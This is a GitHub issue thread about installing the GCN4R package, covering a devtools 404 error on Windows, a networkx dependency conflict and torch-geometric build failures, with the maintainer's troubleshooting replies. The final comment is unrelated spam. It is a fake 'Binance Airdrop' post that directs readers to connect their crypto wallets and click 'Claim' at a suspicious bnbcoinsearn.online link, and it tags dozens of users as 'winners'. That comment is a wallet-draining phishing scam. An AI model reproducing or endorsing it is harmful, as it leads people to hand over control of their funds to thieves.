### ISSUE TITLE
Fail to install on Windows

### ISSUE THREAD

**Issue by ericYH01** [jlevy44/GCN4R#7]
Hi,
Thanks for the great work, just what I am looking for.
However, I have problem when installing on windows OS.
here is the message
```
> devtools::install_github("jlevy44/GCN4R")
Error: Failed to install 'unknown package' from GitHub:
  HTTP error 404.
  Not Found

  Did you spell the repo owner (`jlevy44`) and repo name (`GCN4R`) correctly?
  - If spelling is correct, check that you have the required permissions to access the repo.

```
I am with Microsoft R open 4.0.2

Please advise,
Many thanks,
eric

By the way, what version of R would you recommend?

**Comment by jlevy44** [comment]
Hi Eric,
The software was designed with R v3.6, I am not sure if incompatibilities exist for Rv4 but am happy to patch issues that arise. Can you verify ref = "master"?

If there are issues with master, I can also make another branch.

**Comment by ericYH01** [comment]
> Hi Eric, The software was designed with R v3.6, I am not sure if incompatibilities exist for Rv4 but am happy to patch issues that arise. Can you verify ref = "master"?
> 
> If there are issues with master, I can also make another branch.

bad luck for me, still not able to install.
I'd tried `git clone`, `download zip`, and not having good luck.
Will try other version, and see if I can solve this issue.

![image](https://user-images.githubusercontent.com/83878418/148012011-c966e7b7-ef95-4e35-8a37-765ea8e7258d.png)

**Comment by ericYH01** [comment]
Updated
Here is the issue I encountered when installing on Ubuntu 1804 + Python 3.6.13

```
Downloading mock-3.0.5-py2.py3-none-any.whl (25 kB)
INFO: pip is looking at multiple versions of <Python from Requires-Python> to determine which version is compatible with other requirements. This could take a while.
INFO: pip is looking at multiple versions of captum to determine which version is compatible with other requirements. This could take a while.
INFO: pip is looking at multiple versions of gcn4r to determine which version is compatible with other requirements. This could take a while.
ERROR: Cannot install gcn4r and gcn4r==0.1 because these package versions have conflicting dependencies.

The conflict is caused by:
    gcn4r 0.1 depends on networkx==2.4
    cdlib 0.1.8 depends on networkx<2.4 and >=2.2

To fix this you could try to:
1. loosen the range of package versions you've specified
2. remove package versions to allow pip attempt to solve the dependency conflict

ERROR: ResolutionImpossible: for help visit https://pip.pypa.io/en/latest/user_guide/#fixing-conflicting-dependencies

```

**Comment by jlevy44** [comment]
Ok, I just updated the package dependencies. Does the install work now?

Also, you may need to reinstall torch geometric with the following installation instructions with the set version: https://pytorch-geometric.readthedocs.io/en/latest/notes/installation.html

**Comment by ericYH01** [comment]
Hi  Joshua,
Here is a short stiory.
first, I setup a virtualenv with python 3.6, with cuda 10.2 etc, on ubuntu 1804.
then, `pip3 install git+https://github.com/jlevy44/GCN4R`

At this moment, err msg says, "no such module as torch", so I installed torch independedly as following,
```
  pip install torch==1.4.0 torchvision==0.5.0
  pip3 install git+https://github.com/jlevy44/GCN4R
```
Still wrong, `Failed to build torch-cluster torch-scatter torch-sparse torch-spline-conv`

and `pip3 install torch-cluster==1.5.4 torch-scatter==2.0.4 torch-sparse==0.6.1 torch_spline_conv==1.2.0` doesn't work.

Hope the information might be useful for you.
Thanks,
Eric

**Comment by jlevy44** [comment]
Do you have access to anaconda? If so, I would recommend setting up that environment.

I've also updated the readme to contain new installation instructions, including running install_gcn4r_dependencies, which should set up those difficult to install packages with the appropriate wheels. Torch should automatically be installed with gcn4r. pip and pip3, in certain virtual environments can refer to different versions of python. You may want to run the following:
```
which pip
which pip3
```
To ensure they are pointing to the correct environment.

**Comment by ericYH01** [comment]
hi Levy,
Have installed on MRO 4.0.2 + Rstudio Server + Ubuntu 4.02. Quite complicated but doable.
Just FYI,
thanks.
Eric

**Comment by jlevy44** [comment]
Thanks Eric,
Sorry to hear you went through so much trouble. I developed this package using a Mac, and unfortunately did not test the installation on Windows. Installing packages on Windows using devtools can be a pain. I will have to give optimal software packaging another thought. Potentially I could work on a Docker container, though this requires users to have Docker installed.

I'll leave this issue open until I can fully troubleshoot a Windows install.

Cheers,
Joshua

**Comment by ericYH01** [comment]
You are more than welcome. It's interesting that github returns nothing back when I'm working with the package.

Basically the idea is to clone the package, and  generate a compression file, then `make` it in R environment. The complexity comes from the missing libraries which we have to install manually. 

I think, it's nothing to do with your package but my doubtful configuration. So thank you for your generous support. 

Many thanks and happy new Chinese year of Tiger, 
Eric

**Comment by jlevy44** [comment]
Typically the devtools install should be sufficient, though I will continue to work on this.

**Comment by jlevy44** [comment]
Happy new year :)

**Comment by sauplatform** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @Mr-ONADASKY, @mastanca, @HeinKhantZaw, @0xti4n, @Glubiz, @mxhsnowy, @vedic-partap, @Violet-Bora-Lee, @stevending1st, @chi-bes, @rizwan-exe, @AlexiaChen, @Superoldman96, @jiazhong520, @safarli, @HasanSourav, @notabombe, @bluucaterpilla, @IliasElbarnoussi, @srihar5ha, @hnhx166, @zhangjt007, @sandropons, @Anemoicc, @JingwenTian, @ithaiq, @ntgn81, @jerrison, @PedersenBrian, @turingnixstyx, @joethesaint, @steal-7126, @darkmatter11235, @h3lio5, @ESTHANATOS, @kamarezu, @rojas-diego, @lixixixi, @mdanjumkamali, @0xBeshoy, @aclk, @borbe7, @adityakaaltatva, @AlanDev99, @shineframe, @OnescuAlex-Vlad, @zclfly, @prite36, @LINQIWN, @mimistjohns
